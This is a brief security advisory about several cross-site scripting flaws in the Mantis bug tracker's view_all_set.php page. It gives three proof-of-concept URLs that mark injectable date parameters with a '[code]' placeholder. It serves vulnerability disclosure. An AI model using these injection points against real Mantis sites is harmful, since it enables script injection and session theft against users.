Mantis View_All_Set.PHP Multiple Cross-Site Scripting Vulnerabilities

Mantis View_All_Set.PHP Multiple Cross-Site Scripting Vulnerabilities

Attackers can exploit these issues via a web client.

The following proof-of-concept examples are available:

http://www.example.com/view_all_set.php?type=1&temporary=y&do_filter_by_date=on&start_year=2006&start_month=03&start_day=[code]
http://www.example.com/view_all_set.php?type=1&temporary=y&do_filter_by_dateon&start_year=[code]
http://www.example.com/view_all_set.php?type=1&temporary=y&do_filter_by_date=on&start_year=2006&start_month=[code]